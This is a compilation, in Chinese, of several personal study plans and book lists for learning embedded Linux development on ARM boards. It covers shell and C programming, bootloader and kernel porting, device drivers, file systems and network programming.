使用Emacs编辑文件使用其他编辑器

2

认识后台程序Bash编程熟悉Linux系统下的编辑环境熟悉Linux下的各种Shell 熟练进行shell编程熟悉vi基本操作 熟悉Emacs的基本操作比较不同shell的区别 编写一个测试服务器是否连通的shell脚本程序编写一个查看进程是否存在的shell脚本程序 编写一个带有循环语句的shell脚本程序

3、Linux 下的 C 编程基础
linux C语言环境概述 Gcc使用方法 Gdb调试技术 Autoconf Automake Makefile 代码优化 熟悉Linux系统下的开发环境熟悉Gcc编译器 熟悉Makefile规则编写Hello,

chi dazzle,World程序 使用 make命令编译程序 编写带有一个循环的程序调试一个有问题的程序
4、嵌入式系统开发基础
嵌入式系统概述 交叉编译 配置TFTP服务 配置NFS服务下载Bootloader和内核 嵌入式Linux应用软件开发流程熟悉嵌入式系统概念以及开发流程建立嵌入式系统开发环境制作cross_gcc工具链 编译并下载U-boot 编译并下载Linux内核 编译并下载Linux应用程序
4、嵌入式系统移植
Linux内核代码 平台相关代码分析 ARM平台介绍 平台移植的关键技术 移植Linux内核到 ARM平台 了解移植的概念 能够移植Linux内核移植Linux2.6内核到 ARM9开发板
5、嵌入式 Linux 下串口通信
串行I/O的基本概念 嵌入式Linux应用软件开发流程 Linux系统的文件和设备 与文件相关的系统调用 配置超级终端和MiniCOM能够熟悉进行串口通信熟悉文件I/O 编写串口通信程序 编写多串口通信程序
6、嵌入式系统中多进程程序设计
Linux系统进程概述 嵌入式系统的进程特点 进程操作 守护进程 相关的系统调用了解Linux系统中进程的概念能够编写多进程程序编写多进程程序 编写一个守护进程程序 sleep系统调用任务管理、同步与通信 Linux任务概述任务调度 管道 信号 共享内存 任务管理 API 了解Linux系统任务管理机制 熟悉进程间通信的几种方式 熟悉嵌入式Linux中的任务间同步与通信编写一个简单的管道程序实现文件传输编写一个使用共享内存的程序
7、嵌入式系统中多线程程序设计
线程的基础知识 多线程编程方法 线程应用中的同步问题了解线程的概念 能够编写简单的多线程程序编写一个多线程程序
8、嵌入式 Linux 网络编程
网络基础知识 嵌入式Linux中TCP/IP网络结构 socket 编程 常用 API函数 分析Ping命令的实现 基本UDP套接口编程 许可证管理PPP协议 GPRS 了解嵌入式Linux网络体系结构能够进行嵌入式Linux环境下的socket 编程 熟悉UDP协议、PPP协议 熟悉GPRS 使用socket 编写代理服务器 使用socket 编写路由器 编写许可证服务器指出TCP和UDP的优缺点 编写一个web服务器 编写一个运行在 ARM平台的网络播放器
9、GUI 程序开发
GUI基础 嵌入式系统GUI类型 编译QT 进行QT开发熟悉嵌入式系统常用的GUI 能够进行QT编程使用QT编写“Hello，World”程序 调试一个加入信号/槽的实例 通过重载QWidget 类方法处理事件
10、Linux 字符设备驱动程序
设备驱动程序基础知识 Linux系统的模块 字符设备驱动分析 fs_operation结构 加载驱动程序了解设备驱动程序的概念 了解Linux字符设备驱动程序结构能够编写字符设备驱动程序编写Skull驱动 编写键盘驱动 编写I/O驱动分析一个看门狗驱动程序 对比Linux2.6内核与2.4内核中字符设备驱动的不同Linux 块设备驱动程序块设备驱动程序工作原理 典型的块设备驱动程序分析 块设备的读写请求队列了解Linux块设备驱动程序结构 能够编写简单的块设备驱动程序比较字符设备与块设备的异同 编写MMC卡驱动程序 分析一个文件系统 对比Linux2.6内核与2.4内核中块设备驱动的不同
11、文件系统
虚拟文件系统 文件系统的建立 ramfs内存文件系统 proc文件系统 devfs 文件系统 MTD技术简介 MTD块设备初始化 MTD块设备的读写操作了解Linux系统的文件系统了解嵌入式Linux的文件系统 了解MTD技术 能够编写简单的文件系统为 ARM9开发板添加 MTD支持 移植JFFS2文件系统通过proc文件系统修改操作系统参数 分析romfs 文件系统源代码创建一个cramfs 文件系统 、Shell 编程基础
Shell简介

<二>

学习掌握嵌入 Linux 的开发与移植 现在非常流行。
各种学习文章与培训班，充斥书店 街头。

笔者 也上了路，经历漫长的摸索，终于一日开窍，但的确 糟蹋了 很多 金钱与时间。 作为穷人，现写下自己的感受，供好学寒士 参考。

第一要点： 实验重于看书 （多编码，少翻书）
一定首先搭建x86实验环境。
用旧计算机（周末电脑城抛售存货，有新的），搭建一套 实验环境。
host主机: 一台PC机（能够跑redhat linux，看问档 就可以了,配网卡与软驱）。
target目标机： 一块旧PC主板，配一张网卡和一个软驱，电源。
附件： 交网线 ，交串口线

够了，不会超过3千元（已经很满足了）。

软件全部到 电脑城/网站 下载。

先不管什么arm ppc mips, 以后看看文档吧。

第二重点：GNU C编译
在PC 上安装 redhat linux 包括 开发工具。
熟悉linux 的配置命令。

练习 linux 的 C 语言编程，多个程序的编译工程制作。
无聊的话，将C语言教材的例程，编译十几个，熟悉GNU 编译器。www.gnu.org
包括gcc make ld objdump ar 等 GNU toolkit

第三重点：realtime linux 内核编程/加载到目标板运行。
1。 下载 rt-linux ,或uclinux 或什么 非 redhat的linux 源码，一定 是包括,编译工程makefile, 并且for x86 PC的。
2。修改和配置程序，将 rtlinux的 标准 console口 改为串口，不是vga与键盘。
3。在redhat linux 环境下，编译 这个 embedded linux内核。
用mkboot的这样程序（或按代码中工具，） 将编译好的内核执行文件 拷贝定位软盘引导区。

4。用这张软盘引导在目标PC主板 。
在PC主机的 串口终端上配置 PC主板目标机。 效果同 redhat linux terminal console一样。

以后越来月难，坚持。

第四个重点 编译跑通网卡的驱动程序
下载编译 你的网卡驱动源码
跑通 主机与目标机的 网络通讯。
不要太动头想， ping 通就是了。

第五个重点 用tftp 下载执行文件从 PC主机 到 目标机运行。

第六个重点 GNU GDB 远程在线调试（网口调试）

第七个重点 实时内核学习/修改
照文章/书 分析调试/破坏 内核的源码。
主要是 调度/消息/存储/文件/进程/线程/互斥 等

单独跑跑， 了解内核功能就是了。

第八个重点 TCP/IP的学习
下载一个 简单的web server (http server)
学习理解，并编译加载运行。
将 PC主板目标机 看作网站服务器，然后在PC主机的网络浏难器中 访问这个 web server.
有兴趣，把你的照片加载到目标机的 html网页中。
www.zebra.org

第九个重点 网卡驱动程序分析
了解 PCI总线原理，尝试独立写点网卡驱动程序，过滤以太报文的处理。 跟踪处理 特殊的报文。

第十个重点USB和 FLASH文件系统练习。（可以跳过）
可以分析修改 USB与FLASH文件系统源码。
一定要分析源码，上网查 FLASH的型号。

第十一个重点 路由器实验。
分析zebra方面的源码，再买一张网卡。
尝试分析 NAT RIP等协议，将你的PC板目标机，变成一台简单的路由器。

以后的实验 需要根据 行业来，
例如，mini-GUI (图形编程），或 DVR (硬盘录象机），或IP Vedio WebTV 服务器。

可以玩好几年，当然最好找工作前，有针对地做实验。

一句话，动手修改编码，不要只看看。

<三>

嵌入式Linux操作系统学习规划
ARM+LINUX路线，主攻嵌入式Linux操作系统及其上应用软件开发目标：
（1） 掌握主流嵌入式微处理器的结构与原理（初步定为arm9）
（2） 必须掌握一个嵌入式操作系统 （初步定为uclinux或linux,版本待定）
（3） 必须熟悉嵌入式软件开发流程并至少做一个嵌入式软件项目。
从事嵌入式软件开发的好处是：
（1）目前国内外这方面的人都很稀缺。这一领域入门门槛较高，所以非专业IT人员很难切入这一领域；另一方面，是因为这一领域较新，目前发展太快，大多数人无条件接触。
（2）与企业计算等应用软件不同，嵌入式领域人才的工作强度通常低一些（但收入不低）。
（3）哪天若想创业，搞自已的产品，嵌入式不像应用软件那样容易被盗版。硬件设计一般都是请其它公司给订做（这叫“贴牌”：OEM），都是通用的硬件，我们只管设计软件就变成自己的产品了。
（4）兴趣所在，这是最主要的。
从事嵌入式软件开发的缺点是：
（1）入门起点较高，所用到的技术往往都有一定难度，若软硬件基础不好，特别是操作系统级软件功底不深，则可能不适于此行。
（2）这方面的企业数量要远少于企业计算类企业。
（3）有少数公司经常要硕士以上的人搞嵌入式，主要是基于嵌入式的难度。但大多数公司也并无此要求，只要有经验即可。
（4）平台依托强，换平台比较辛苦。
兴趣的由来：
1、成功观念不同，不虚度此生，就是我的成功。
2、喜欢思考，挑战逻辑思维。
3、喜欢C
C是一种能发挥思维极限的语言。关于C的精神的一些方面可以被概述成短句如下：
相信程序员。
不要阻止程序员做那些需要去做的。
保持语言短小精干。
一种方法做一个操作。
使得它运行的够快，尽管它并不能保证将是可移植的。
4、喜欢底层开发，讨厌vb类开发工具（并不是说vb不好）。
5、发展前景好，适合创业，不想自己要死了的时候还是一个工程师。
方法步骤：
1、基础知识：
目的：能看懂硬件工作原理，但重点在嵌入式软件，特别是操作系统级软件，那将是我的优势。
科目：数字电路、计算机组成原理、嵌入式微处理器结构。
汇编语言、C/C++、编译原理、离散数学。
数据结构和算法、操作系统、软件工程、网络、数据库。
方法：虽科目众多，但都是较简单的基础，且大部分已掌握。不一定全学，可根据需要选修。
主攻书籍：the c++ programming language（一直没时间读）、数据结构-C2。

2、学习linux：
目的：深入掌握linux系统。
　　　方法：使用linux—〉linxu系统编程开发—〉驱动开发和分析linux内核。先看深，那主讲原理。看几遍后，看情景分析，对照深看，两本交叉，深是纲，情是目。剖析则是0.11版，适合学习。最后深入代码。
主攻书籍：linux内核完全剖析、unix环境高级编程、深入理解linux内核、情景分析和源代。
3、学习嵌入式linux：
目的：掌握嵌入式处理器其及系统。
方法：（1）嵌入式微处理器结构与应用：直接arm原理及汇编即可，不要重复x86。
　　　（2）嵌入式操作系统类：ucOS/II简单，开源，可供入门。而后深入研究uClinux。
　　　（3）必须有块开发板（arm9以上），有条件可参加培训（进步快，能认识些朋友）。
　　　主攻书籍：毛德操的《嵌入式系统》及其他arm9手册与arm汇编指令等。

4、深入学习：
　　　A、数字图像压缩技术：主要是应掌握MPEG、mp3等编解码算法和技术。
　　　B、通信协议及编程技术：TCP/IP协议、802.11，Bluetooth，GPRS、GSM、CDMA等。
　　　C、网络与信息安全技术：如加密技术，数字证书CA等。
　　　D、DSP技术：Digital Signal Process，DSP处理器通过硬件实现数字信号处理算法。
　　　说明：太多细节未说明，可根据实际情况调整。重点在于1、3，不必完全按照顺序作。对于学习c++，理由是c++不只是一种语言，一种工具，她还是一种艺术，一种文化，一种哲学理念、但不是拿来炫耀得东西。对于linux内核，学习编程，读一些优秀代码也是有必要的。
　　　注意：　要学会举一反多，有强大的基础，很多东西简单看看就能会。想成为合格的程序员，前提是必须熟练至少一种编程语言，并具有良好的逻辑思维。一定要理论结合实践。
　　　不要一味钻研技术，虽然挤出时间是很难做到的，但还是要留点余地去完善其他的爱好，比如宇宙，素描、机械、管理，心理学、游戏、科幻电影。还有一些不愿意做但必须要做的！
　　　技术是通过编程编程在编程编出来的。永远不要梦想一步登天，不要做浮躁的人，不要觉得路途漫上。而是要编程编程在编程，完了在编程，在编程！等机会来了在创业（不要相信有奇迹发生，盲目创业很难成功，即便成功了发展空间也不一定很大）。

　　　嵌入式书籍推荐
　　　Linux基础
　　　1、《Linux与Unix Shell 编程指南》
　　　C语言基础
　　　1、《C Primer Plus，5th Edition》【美】Stephen Prata着
　　　2、《The C Programming Language, 2nd Edition》【美】Brian W. Kernighan David M. Rithie（K & R）着
　　　3、《Advanced Programming in the UNIX Environment，2nd Edition》（APUE）
　　　4、《嵌入式Linux应用程序开发详解》
　　　Linux内核
　　　1、《深入理解Linux内核》（第三版）
　　　2、《Linux内核源代码情景分析》毛德操 胡希明著
　　　研发方向
　　　1、《UNIX Network Programming》（UNP）
　　　2、《TCP/IP详解》
　　　3、《Linux内核编程》
　　　4、《Linux设备驱动开发》（LDD）　
　　　5、《Linux高级程序设计》 杨宗德著
　　　硬件基础
　　　1、《ARM体系结构与编程》杜春雷着
　　　2、S3C2410 Datasheet
　　　英语基础
　　　1、《计算机与通信专业英语》
　　　系统教程
　　　1、《嵌入式系统――体系结构、编程与设计》
　　　2、《嵌入式系统――采用公开源代码和StrongARM/Xscale处理器》毛德操 胡希明着
　　　3、《Building Embedded Linux Systems》　　　
　　　4、《嵌入式ARM系统原理与实例开发》 杨宗德著
　　　理论基础
　　　1、《算法导论》
　　　2、《数据结构（C语言版）》
　　　3、《计算机组织与体系结构?性能分析》
　　　4、《深入理解计算机系统》【美】Randal E. Bryant David O’’Hallaron着
　　　5、《操作系统：精髓与设计原理》
　　　6、《编译原理》
　　　7、《数据通信与计算机网络》
　　　8、《数据压缩原理与应用》

　　　C语言书籍推荐
　　　1. The C programming language 《Ｃ程序设计语言》
　　　2. Pointers on C 《Ｃ和指针》
　　　3. C traps and pitfalls 《Ｃ陷阱与缺陷》
　　　4. Expert C Lanuage 《专家Ｃ编程》
　　　5. Writing Clean Code —–Microsoft Techiniques for Developing Bug-free C Programs
　　　《编程精粹–Microsoft 编写优质无错Ｃ程序秘诀》
　　　6. Programming Embedded Systems in C and C++ 《嵌入式系统编程》
　　　7.《C语言嵌入式系统编程修炼》
　　　8.《高质量C++/C编程指南》林锐
　　　尽可能多的编码，要学好C，不能只注重C本身。算法，架构方式等都很重要。

这里很多书其实是推荐而已，不必太在意，关键还是基础，才是重中之重！！！

<四>

嵌入式Linux学习的基本的原则是通学+专长。

通学，即了解该方向的相关领域，但是“通”不等于“泛”，对待学习应该举一反三，把握事物的本质。如果能用通用的思想去解决问题，那么才算学有小成。比如，五一学习Mark Balch的《COMPLETE DIGITAL DESIGN》后，对嵌入式系统在上电之后，软硬件如何配合工作有了更深入的理解。虽然这本书不是介绍嵌入式系统，但是很多技术是通用的。有开放的思维，把握自己研究的中心，把其他领域的方法思想吸收过来为我所用，这样可以对研究中心有更为深入的认识。 

专长，即研究中心。通学的目的在于打好基础，融会贯通。但是仅仅如此是不够的。因为通学不可能把每个方向都研究精深，人的精力毕竟是有限的嘛，所以要有自己感兴趣的方向，以此作为研究中心，深入深入再深入，成为该方向的专家。以通促专，提炼自己的思想，以开放的思维谋求最大的提升！ 

我选择的研究领域是嵌入式系统（ARM+Linux），在该领域有四种类型的工作： 
1、系统设计 
2、硬件设计 
3、驱动开发及内核移植 
4、应用开发 

基于我目前的认识，研究中心是驱动开发及内核移植，争取以后做系统设计，成为嵌入式系统设计工程师。 

嵌入式Linux学习分为三个阶段: 
第一阶段：建立嵌入式Linux知识体系框架。 
第二阶段：深入学习嵌入式Linux的基本技术。 
第三阶段：精深专长。 

这三个阶段可以交叉。第一阶段通过2006年暑假两个月的强化学习，已经完成。现在正在进行第二阶段的学习。这个阶段关注嵌入式Linux软件开发的基本技术，包括：JTAG的工作原理及其实现（以JFlash为主）、bootloader的原理及实现（以U-boot为主）、kernel移植与开发（尝试2.4.18、2.6.X）、FS制作（尝试ramdisk、cromfs等）、应用程序的移植（基本掌握开发）、调试和诊断技术。在这个阶段，同时打好硬件基础（掌握S3C2410）和软件基础（bash、C和基本的开发工具）。第三个阶段在读研期间，以研究OS原理和Linux内核源代码为主，与第二阶段交叉进行。 

其实，每天进步一点点，把这一点点所学加到已经建立的知识体系框架中，日积月累，思想认识必定会有所提升。虽然都认可宁可断其一指，不可伤其十指，但是应该承认人的认识是有局限性的。比如学习A时，因缺乏实践等各方面原因，可能认识不深入，也许在学习B时突然认识到了。所以一定要举一反三，而且要反复学习。记住基础的技术，努力学习先进技术，不停止前进的脚步。

<五>

【序】学习Linux开发近一年，由于我是实验室第一个从事这方面开发的，学习过程中遇到了很多问题，可是总是求师无门，只能一个人自己摸索，同时也充分利用了网络，参考了广大CSDN博友及相关论坛的帖子，在此表示感谢！

嵌入式Linux的学习涵盖的范围比较广，下从bootloader，到内核移植、文件系统，中间的驱动开发，到上层的应用程序调试、开发环境等，变化莫测，经常是别人的能用自己的就有问题。

由于缺乏他人适当指点，自己在学习过程中也走了很多弯路，整个开发环境的搭建整了N久，更搞笑的是经常听说模块加载insmod，可连这个命令在主机还是ARM上用都没搞明白，那叫一个汗啊！大家勿笑，嵌入式Linux的初学者确实对交叉环境比较不懂，我是其一啊。

现在适逢好友小布丁要学习嵌入式Linux，就将近一年来的学习体会总结下，整理了一个总体的学习计划，希望给那些曾经像我一样彷徨的人一些帮助。后续将完善此文档，上传到个人空间上，先贴出目录。本人水平有限，不当之处，还请大家指正！

小布丁同学曾在我处于困境时一如既往的理解我支持我，给我信心给我鼓励，谢谢你，美丽开怀的小布丁，希望你能happy and fascinating forever！

谨以此文献给我们永远可爱迷人的小布丁！

Sailor_forever

September 3, 2007

第一篇 Linux主机开发环境（15天）

1.1 Vmvare下Linux的安装（优先）

1.2 Windows下从硬盘安装Linux（可选）

1.3 Linux的基本命令及使用

1.4 Linux的文件系统及与windows的文件共享

1.5 GCC开发工具

1.6 GDB调试

1.7 Makefile编写

1.8 主机端的模块编程

1.9 简单应用程序

第二篇 ARM＋Linux开发环境（7天）

2.1 交叉开发环境介绍

2.2 交叉编译器cross-tool

2.3 配置主机开发环境

2.3.1 配置超级终端minicom或hyperterminal或DNW

2.3.2 配置TFTP网络服务

2.3.3 配置NFS主机端网络服务

2.4 建立交叉开发环境

   2.4.1配置NFS ARM端网络服务

   2.4.2 编译ARM-gdb

2.5 交叉调试应用程序

2.6 ARM上的简单模块编程

第三篇 Linux系统bootlaoder移植（7天）

3.1 Bootloader介绍

3.2 u-boot命令及环境变量

3.3 u-boot的编译配置

3.4 u-boot源码分析

3.5 u-boot移植过程

第四篇 Linux的内核移植（15天）

4.1 配置编译Linux内核

4.1.1 Linux内核源代码结构

4.1.2 Linux内核编译选项解析

4.1.3 Linux内核编译链接

4.2 Linux启动过程源代码分析

4.3 Linux内核移植平台相关代码分析

第五篇 Linux的驱动编程（15天）

5.1 Linux的设备管理

5.2 Linux的驱动程序结构

5.3 简单的字符设备驱动程序

5.4 Linux内核模块的加载卸载

5.5 Linux的打印调试方法

5.6 字符设备的高级属性－中断

5.6 常见的串口网口驱动分析

第六篇 文件系统制作（5天）

6.1 Linux文件系统制作

6.2 文件系统和存储设备的选择

6.3 部署Ramdisk文件系统的过程

第七篇 Linux的高级应用编程（5天）

总用时 15＋7＋7＋15＋15＋5＋5 大概两个半月